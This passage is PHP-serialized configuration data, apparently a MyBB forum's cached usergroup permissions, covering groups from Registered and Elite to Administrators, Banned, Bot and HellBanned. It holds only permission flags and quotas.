0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:2;a:73:{s:3:\"gid\";s:1:\"2\";s:4:\"type\";s:1:\"1\";s:5:\"title\";s:10:\"Registered\";s:11:\"description\";s:66:\"After registration, all users are placed in this group by default.\";s:9:\"namestyle\";s:44:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"0\";s:9:\"starimage\";s:23:\"images/stars/yellow.png\";s:5:\"image\";s:0:\"\";s:9:\"disporder\";s:1:\"3\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:3:\"100\";s:15:\"maxpmrecipients\";s:1:\"1\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"5\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:2:\"20\";s:13:\"timebtwnposts\";s:2:\"30\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:4:\"2880\";}i:9;a:73:{s:3:\"gid\";s:1:\"9\";s:4:\"type\";s:1:\"2\";s:5:\"title\";s:6:\"Elite \";s:11:\"description\";s:29:\"Elite; Upgraded members group\";s:9:\"namestyle\";s:63:\"{username}\";s:9:\"usertitle\";s:13:\"Elite Member!\";s:5:\"stars\";s:1:\"7\";s:9:\"starimage\";s:23:\"images/stars/orange.png\";s:5:\"image\";s:22:\"./images/ub/elite1.png\";s:9:\"disporder\";s:1:\"4\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"1\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"1\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:4:\"1000\";s:15:\"maxpmrecipients\";s:1:\"3\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"4\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"1\";s:12:\"canaddevents\";s:1:\"1\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"1\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"1\";s:15:\"reputationpower\";s:1:\"3\";s:17:\"maxreputationsday\";s:1:\"4\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:3:\"500\";s:14:\"cancustomtitle\";s:1:\"1\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:2:\"20\";s:13:\"timebtwnposts\";s:2:\"30\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:3;a:73:{s:3:\"gid\";s:1:\"3\";s:4:\"type\";s:1:\"1\";s:5:\"title\";s:5:\"Staff\";s:11:\"description\";s:35:\"These users can moderate any forum.\";s:9:\"namestyle\";s:62:\"{username}\";s:9:\"usertitle\";s:15:\"Super Moderator\";s:5:\"stars\";s:1:\"8\";s:9:\"starimage\";s:23:\"images/stars/purple.gif\";s:5:\"image\";s:23:\"./images/ub/staffit.png\";s:9:\"disporder\";s:1:\"6\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"1\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"1\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"1\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"1\";s:17:\"candenypmreceipts\";s:1:\"1\";s:7:\"pmquota\";s:4:\"3000\";s:15:\"maxpmrecipients\";s:1:\"5\";s:12:\"cansendemail\";s:1:\"0\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:2:\"10\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"1\";s:16:\"canviewonlineips\";s:1:\"1\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"1\";s:13:\"showforumteam\";s:1:\"1\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"1\";s:15:\"reputationpower\";s:1:\"6\";s:17:\"maxreputationsday\";s:1:\"8\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"1\";s:12:\"canwarnusers\";s:1:\"1\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"3\";s:8:\"canmodcp\";s:1:\"1\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"1\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:4;a:73:{s:3:\"gid\";s:1:\"4\";s:4:\"type\";s:1:\"1\";s:5:\"title\";s:14:\"Administrators\";s:11:\"description\";s:39:\"The group all administrators belong to.\";s:9:\"namestyle\";s:69:\"{username}\";s:9:\"usertitle\";s:13:\"Administrator\";s:5:\"stars\";s:1:\"8\";s:9:\"starimage\";s:20:\"images/stars/red.gif\";s:5:\"image\";s:22:\"./images/ub/admin5.png\";s:9:\"disporder\";s:1:\"7\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"1\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"1\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"1\";s:17:\"candenypmreceipts\";s:1:\"1\";s:7:\"pmquota\";s:4:\"5000\";s:15:\"maxpmrecipients\";s:1:\"0\";s:12:\"cansendemail\";s:1:\"1\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"0\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"1\";s:16:\"canviewonlineips\";s:1:\"1\";s:5:\"cancp\";s:1:\"1\";s:10:\"issupermod\";s:1:\"1\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"1\";s:13:\"showforumteam\";s:1:\"1\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"1\";s:15:\"reputationpower\";s:2:\"10\";s:17:\"maxreputationsday\";s:1:\"0\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"1\";s:12:\"canwarnusers\";s:1:\"1\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"1\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"1\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:5;a:73:{s:3:\"gid\";s:1:\"5\";s:4:\"type\";s:1:\"1\";s:5:\"title\";s:19:\"Awaiting Activation\";s:11:\"description\";s:84:\"Users that have not activated their account by email or manually been activated yet.\";s:9:\"namestyle\";s:46:\"{username}\";s:9:\"usertitle\";s:21:\"Account not Activated\";s:5:\"stars\";s:1:\"0\";s:9:\"starimage\";s:15:\"images/star.gif\";s:5:\"image\";s:0:\"\";s:9:\"disporder\";s:1:\"0\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"0\";s:10:\"cansendpms\";s:1:\"0\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:2:\"20\";s:15:\"maxpmrecipients\";s:1:\"5\";s:12:\"cansendemail\";s:1:\"0\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"1\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"0\";s:14:\"canratemembers\";s:1:\"0\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"0\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"0\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"0\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"1\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"0\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:6;a:73:{s:3:\"gid\";s:1:\"6\";s:4:\"type\";s:1:\"1\";s:5:\"title\";s:10:\"Moderators\";s:11:\"description\";s:37:\"These users moderate specific forums.\";s:9:\"namestyle\";s:61:\"{username}\";s:9:\"usertitle\";s:9:\"Moderator\";s:5:\"stars\";s:1:\"7\";s:9:\"starimage\";s:21:\"images/stars/blue.png\";s:5:\"image\";s:20:\"./images/ub/mod1.png\";s:9:\"disporder\";s:1:\"5\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"1\";s:14:\"canpostthreads\";s:1:\"1\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"1\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"1\";s:14:\"candeleteposts\";s:1:\"1\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"1\";s:12:\"canpostpolls\";s:1:\"1\";s:12:\"canvotepolls\";s:1:\"1\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"1\";s:10:\"cansendpms\";s:1:\"1\";s:11:\"cantrackpms\";s:1:\"1\";s:17:\"candenypmreceipts\";s:1:\"1\";s:7:\"pmquota\";s:4:\"1500\";s:15:\"maxpmrecipients\";s:1:\"5\";s:12:\"cansendemail\";s:1:\"0\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"1\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"1\";s:16:\"canuploadavatars\";s:1:\"1\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"1\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"1\";s:15:\"reputationpower\";s:1:\"4\";s:17:\"maxreputationsday\";s:1:\"4\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:4:\"5000\";s:14:\"cancustomtitle\";s:1:\"1\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"1\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:2:\"20\";s:13:\"timebtwnposts\";s:2:\"10\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:7;a:73:{s:3:\"gid\";s:1:\"7\";s:4:\"type\";s:1:\"1\";s:5:\"title\";s:6:\"Banned\";s:11:\"description\";s:69:\"The default user group to which members that are banned are moved to.\";s:9:\"namestyle\";s:45:\"{username}\";s:9:\"usertitle\";s:6:\"Banned\";s:5:\"stars\";s:1:\"0\";s:9:\"starimage\";s:15:\"images/star.gif\";s:5:\"image\";s:0:\"\";s:9:\"disporder\";s:1:\"9\";s:13:\"isbannedgroup\";s:1:\"1\";s:7:\"canview\";s:1:\"0\";s:14:\"canviewthreads\";s:1:\"0\";s:15:\"canviewprofiles\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"0\";s:10:\"cansendpms\";s:1:\"0\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:1:\"0\";s:15:\"maxpmrecipients\";s:1:\"0\";s:12:\"cansendemail\";s:1:\"0\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"5\";s:17:\"canviewmemberlist\";s:1:\"0\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"0\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"0\";s:9:\"canusercp\";s:1:\"0\";s:16:\"canuploadavatars\";s:1:\"0\";s:14:\"canratemembers\";s:1:\"0\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"0\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"0\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"1\";s:11:\"attachquota\";s:1:\"0\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"0\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"0\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:8;a:73:{s:3:\"gid\";s:1:\"8\";s:4:\"type\";s:1:\"2\";s:5:\"title\";s:3:\"Bot\";s:11:\"description\";s:20:\"Spiders and Crawlers\";s:9:\"namestyle\";s:45:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"0\";s:9:\"starimage\";s:15:\"images/star.gif\";s:5:\"image\";s:0:\"\";s:9:\"disporder\";s:2:\"10\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"0\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"0\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"0\";s:10:\"cansendpms\";s:1:\"0\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:1:\"1\";s:15:\"maxpmrecipients\";s:1:\"1\";s:12:\"cansendemail\";s:1:\"0\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"4\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"0\";s:16:\"canuploadavatars\";s:1:\"0\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"0\";s:17:\"maxreputationsday\";s:1:\"1\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"0\";s:15:\"candisplaygroup\";s:1:\"0\";s:11:\"attachquota\";s:4:\"5000\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"0\";s:14:\"maxwarningsday\";s:1:\"0\";s:8:\"canmodcp\";s:1:\"0\";s:18:\"showinbirthdaylist\";s:1:\"0\";s:13:\"canoverridepm\";s:1:\"0\";s:9:\"canusesig\";s:1:\"0\";s:15:\"canusesigxposts\";s:1:\"0\";s:11:\"signofollow\";s:1:\"0\";s:15:\"timebtwnthreads\";s:1:\"0\";s:13:\"timebtwnposts\";s:1:\"0\";s:17:\"canremoveeditedby\";s:1:\"0\";s:13:\"edittimelimit\";s:1:\"0\";}i:10;a:73:{s:3:\"gid\";s:2:\"10\";s:4:\"type\";s:1:\"2\";s:5:\"title\";s:10:\"HellBanned\";s:11:\"description\";s:18:\"Hellbanned members\";s:9:\"namestyle\";s:44:\"{username}\";s:9:\"usertitle\";s:0:\"\";s:5:\"stars\";s:1:\"0\";s:9:\"starimage\";s:16:\"images/star.gif \";s:5:\"image\";s:0:\"\";s:9:\"disporder\";s:1:\"8\";s:13:\"isbannedgroup\";s:1:\"0\";s:7:\"canview\";s:1:\"1\";s:14:\"canviewthreads\";s:1:\"1\";s:15:\"canviewprofiles\";s:1:\"1\";s:16:\"candlattachments\";s:1:\"0\";s:14:\"canpostthreads\";s:1:\"0\";s:13:\"canpostreplys\";s:1:\"1\";s:18:\"canpostattachments\";s:1:\"0\";s:14:\"canratethreads\";s:1:\"0\";s:12:\"caneditposts\";s:1:\"0\";s:14:\"candeleteposts\";s:1:\"0\";s:16:\"candeletethreads\";s:1:\"0\";s:18:\"caneditattachments\";s:1:\"0\";s:12:\"canpostpolls\";s:1:\"0\";s:12:\"canvotepolls\";s:1:\"0\";s:12:\"canundovotes\";s:1:\"0\";s:9:\"canusepms\";s:1:\"0\";s:10:\"cansendpms\";s:1:\"0\";s:11:\"cantrackpms\";s:1:\"0\";s:17:\"candenypmreceipts\";s:1:\"0\";s:7:\"pmquota\";s:3:\"100\";s:15:\"maxpmrecipients\";s:1:\"5\";s:12:\"cansendemail\";s:1:\"0\";s:20:\"cansendemailoverride\";s:1:\"0\";s:9:\"maxemails\";s:1:\"4\";s:17:\"canviewmemberlist\";s:1:\"1\";s:15:\"canviewcalendar\";s:1:\"0\";s:12:\"canaddevents\";s:1:\"0\";s:17:\"canbypasseventmod\";s:1:\"0\";s:17:\"canmoderateevents\";s:1:\"0\";s:13:\"canviewonline\";s:1:\"1\";s:15:\"canviewwolinvis\";s:1:\"0\";s:16:\"canviewonlineips\";s:1:\"0\";s:5:\"cancp\";s:1:\"0\";s:10:\"issupermod\";s:1:\"0\";s:9:\"cansearch\";s:1:\"1\";s:9:\"canusercp\";s:1:\"0\";s:16:\"canuploadavatars\";s:1:\"0\";s:14:\"canratemembers\";s:1:\"1\";s:13:\"canchangename\";s:1:\"0\";s:13:\"showforumteam\";s:1:\"0\";s:19:\"usereputationsystem\";s:1:\"1\";s:18:\"cangivereputations\";s:1:\"0\";s:15:\"reputationpower\";s:1:\"1\";s:17:\"maxreputationsday\";s:1:\"5\";s:21:\"maxreputationsperuser\";s:1:\"0\";s:23:\"maxreputationsperthread\";s:1:\"5\";s:15:\"candisplaygroup\";s:1:\"0\";s:11:\"attachquota\";s:4:\"5000\";s:14:\"cancustomtitle\";s:1:\"0\";s:12:\"canwarnusers\";s:1:\"0\";s:18:\"canreceivewarnings\";s:1:\"1\